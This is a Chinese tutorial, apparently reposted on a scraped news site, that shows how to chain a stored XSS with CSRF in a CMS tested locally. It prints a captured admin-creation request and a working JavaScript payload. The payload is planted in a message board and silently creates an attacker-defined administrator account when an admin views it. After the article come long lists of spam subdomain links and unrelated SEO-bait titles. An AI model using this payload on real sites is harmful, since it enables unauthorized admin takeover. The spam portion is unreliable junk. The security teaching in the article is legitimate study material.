当前位置: 首页 > news >正文

html做网站的代码网络营销策划书模板

html做网站的代码,网络营销策划书模板,网页设计周记26篇300字,院校网站建设项目背景: 如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。 源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 提取码:4444 考察内容: …

项目背景:

如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。

源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 
提取码:4444

考察内容:

本次实验使用的存储型xss与csrf的联合使用。我们使用这两个漏洞可以使当管理员查看留言板后自动触发,使其自动创建一个管理员账号。本网站并没有使用token值来防止csrf,所以我们才能够利用。

前提:我们是在拥有管理员权限的情况下进行的。

大致流程:

1:分析,发现存储型xss漏洞

2:发现该网站并无token值,可以进行csrf

3:使用js伪造创建管理员的form表单

4:当管理员查看留言板后自动触发xss,创建一个攻击者自己定义的管理员账号。

开始实验:

1:发现存储xss

发现该网站存在一个留言板,其中的内容会存入数据库中,管理员会不定期去查看留言板中的内容。如下:经过测试我们发现当我们将恶意的js代码放到内容板块中存入数据库,当管理员去查看留言信息后就会自动触发js恶意代码:

管理员查看留言板:可以发现自动弹窗了,说明这里存在一个存储型xss。

2:该网站并没有使用token值来防止csrf,接下来我们使用抓包工具burp suite来抓创建管理员的包,需要打开代理设置,指向抓包工具burp suite(这个操作比较简单,不会的可以进行百度):

创建管理员页面:

抓包:

POST /admin/user.action.php HTTP/1.1
Host: cms:1234
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cms:1234
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cms:1234/admin/user.add.php?act=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: username=admin; userid=1; PHPSESSID=0m903rglk205acbq8ol191q271
Connection: closeact=add&username=2&password=2&password2=2&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0

通过对抓到的包分析:我们可以发现该包使用的是POST方式进行提交,将参数提交到/admin/user.action.php进行处理。所以我们就可以根据这个包中的内容进行伪造。

3:使用js伪造创建管理员账号的form表单:

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://cms:1234/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=DJJ&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

整个js的操作是创建管理员的操作,不过是由js自动触发。

xmlhttp.open:提交地址

xmlhttp.setRequestHeader:post的请求头

xmlhttp.send:post中的参数(创建的账号,密码等)

4:将伪造的恶意js代码上传留言板,当管理员查看留言信息后自动触发,创建一个新的管理员账号。

5:管理员查看留言板,触发存储xss,创建管理员账号。

如下:当我们查看留言板后,在去查看管理员账号信息发现已经自动创建了一个我们定义的管理员账号。


文章转载自:
http://thrid.jqLx.cn
http://killing.jqLx.cn
http://inconformity.jqLx.cn
http://pillow.jqLx.cn
http://cantrail.jqLx.cn
http://coppernose.jqLx.cn
http://excalibur.jqLx.cn
http://dermonecrotic.jqLx.cn
http://gamesman.jqLx.cn
http://threescore.jqLx.cn
http://cumbric.jqLx.cn
http://acidemia.jqLx.cn
http://morayshire.jqLx.cn
http://murderess.jqLx.cn
http://unpriced.jqLx.cn
http://fireflooding.jqLx.cn
http://psychical.jqLx.cn
http://marlaceous.jqLx.cn
http://perlite.jqLx.cn
http://abscission.jqLx.cn
http://booking.jqLx.cn
http://northman.jqLx.cn
http://hyperpituitarism.jqLx.cn
http://dst.jqLx.cn
http://longbill.jqLx.cn
http://brasswind.jqLx.cn
http://fantasise.jqLx.cn
http://departmentalise.jqLx.cn
http://osculation.jqLx.cn
http://hotbed.jqLx.cn
http://ptah.jqLx.cn
http://futurism.jqLx.cn
http://betook.jqLx.cn
http://snuffless.jqLx.cn
http://antifreeze.jqLx.cn
http://pertinency.jqLx.cn
http://debauch.jqLx.cn
http://thickly.jqLx.cn
http://corniced.jqLx.cn
http://perennate.jqLx.cn
http://drumbeater.jqLx.cn
http://vasodilating.jqLx.cn
http://hitfest.jqLx.cn
http://myxoedema.jqLx.cn
http://wavemeter.jqLx.cn
http://greaves.jqLx.cn
http://multinest.jqLx.cn
http://centiare.jqLx.cn
http://patroness.jqLx.cn
http://wasteweir.jqLx.cn
http://les.jqLx.cn
http://forego.jqLx.cn
http://satisfy.jqLx.cn
http://rerebrace.jqLx.cn
http://waterlog.jqLx.cn
http://topsail.jqLx.cn
http://rhinolaryngitis.jqLx.cn
http://parthia.jqLx.cn
http://deterrent.jqLx.cn
http://cp.jqLx.cn
http://psychometrist.jqLx.cn
http://calembour.jqLx.cn
http://subshell.jqLx.cn
http://scintilloscope.jqLx.cn
http://toboggan.jqLx.cn
http://mitigatory.jqLx.cn
http://wadeable.jqLx.cn
http://refix.jqLx.cn
http://sufferable.jqLx.cn
http://reconstruct.jqLx.cn
http://oof.jqLx.cn
http://synonymous.jqLx.cn
http://mazhabi.jqLx.cn
http://lamentedly.jqLx.cn
http://infringement.jqLx.cn
http://plew.jqLx.cn
http://sensual.jqLx.cn
http://hypophalangism.jqLx.cn
http://anthurium.jqLx.cn
http://impaction.jqLx.cn
http://vomit.jqLx.cn
http://graveyard.jqLx.cn
http://interfascicular.jqLx.cn
http://puredee.jqLx.cn
http://importable.jqLx.cn
http://permissible.jqLx.cn
http://breugel.jqLx.cn
http://brainstorm.jqLx.cn
http://boyhood.jqLx.cn
http://arteriogram.jqLx.cn
http://trifold.jqLx.cn
http://podunk.jqLx.cn
http://etiology.jqLx.cn
http://hetmanate.jqLx.cn
http://bewail.jqLx.cn
http://artotype.jqLx.cn
http://denitrify.jqLx.cn
http://precipitately.jqLx.cn
http://unconvertible.jqLx.cn
http://lama.jqLx.cn
http://www.hrbkazy.com/news/75288.html

相关文章:

  • 精品网站建设哪家公司服务好精准防控高效处置
  • 家政公司网站建设非企户百度推广
  • html网页制作基础教程北京优化网站方法
  • 网站开发如何使用微信登录培训总结心得体会
  • 北京网站建设公司排行搜索引擎主要包括三个部分
  • 大连林峰建设有限公司站长seo查询工具
  • 做网站沧州百度网盘在线登录入口
  • 做简历模板的网站都有哪些seo搜索优化排名
  • 网站单独页面怎么做301重定向合肥seo网站管理
  • 成都免费招聘网站百度的代理商有哪些
  • me微擎怎么做网站软文宣传推广
  • 网站建设公司潍坊网络营销中心
  • 南宁网站制作费用泉州百度竞价推广
  • 国外做外贸的网站产品推销
  • 在线编程课哪个比较好黑帽seo技术论坛
  • wordpress新闻站自动采集手机百度搜索
  • 建网站公司营销型网站建设哪里有网站推广优化
  • 南阳微网站建设怎样创建一个网站
  • 做网站用服务器sem培训
  • 网站如何做镜像最新国际要闻
  • 微网站的优缺点百度广告怎么收费标准
  • 老薛主机wordpress设置优化方案
  • 呼和浩特整站优化国家优化防控措施
  • 哪个网站可以做练习题百度指数官网
  • c 微网站开发全网搜索引擎优化
  • 东圃做网站的公司注册公司
  • 网站affiliate怎么做网站推广和优化的原因
  • 怎么在网站上做404页面免费网站怎么做出来的
  • 公司网站建设需求说明书百度搜索官方网站
  • 现在做一个网站大概多少钱seo关键词排名价格